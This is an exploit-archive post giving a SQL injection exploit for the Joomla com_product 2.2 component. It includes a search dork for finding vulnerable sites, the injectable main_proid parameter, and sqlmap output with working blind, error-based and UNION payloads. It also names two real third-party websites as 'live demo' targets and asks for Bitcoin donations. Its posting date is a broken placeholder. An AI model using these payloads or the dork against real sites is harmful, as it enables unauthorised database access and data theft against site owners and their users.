Home / os / win7

Joomla com_product 2.2 SQL injection Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla com_product 2.2 SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>############################## # [xBADGIRL21] # # [N3W PUBLIC 3XPL0IT] # # _,________ # # 0day _T _==____() -- # # /##(_)-' # # /##/ # # x21 # ############################## # Exploit Title : Joomla com_product 2.2 SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_product # version : 2.2 # Tested on: [WIN7] # MyBlog : http://xbadgirl21.blogspot.com # Date: 10-03-2017 # video Proof : https://youtu.be/nxtkKvz6wrY [*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz ###################### #|X|B|A|D|G|I|R|L|2|1| ###################### # [+] Poc : ###################### # [main_proid] Get Parameter Vulnerable To SQLi # http://127.0.0.1/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10 ###################### # [+] SQLmap PoC: ###################### Parameter: main_proid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: main_proid=10 AND 2715=2715 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: main_proid=10 AND (SELECT 7268 FROM(SELECT COUNT(*),CONCAT(0x716a6b7871,(SELECT (ELT(7268=7268,1))),0x7171717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: main_proid=10 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7747466f6c77734d4f614a62786d4a646b7257686c71464173706c6d4f4d6c644a67507765454954,0x7171717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- umHw --- # GET parameter 'main_proid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [!] Live Demo : ###################### # http://www.powerbear.ae/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10 # http://www.germandistribution.com/component/product/mainlevel/designer_litter_bins_and_recycling_bins.html?main_proid=10 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien</BODY></HTML>

 

TOP

Malware :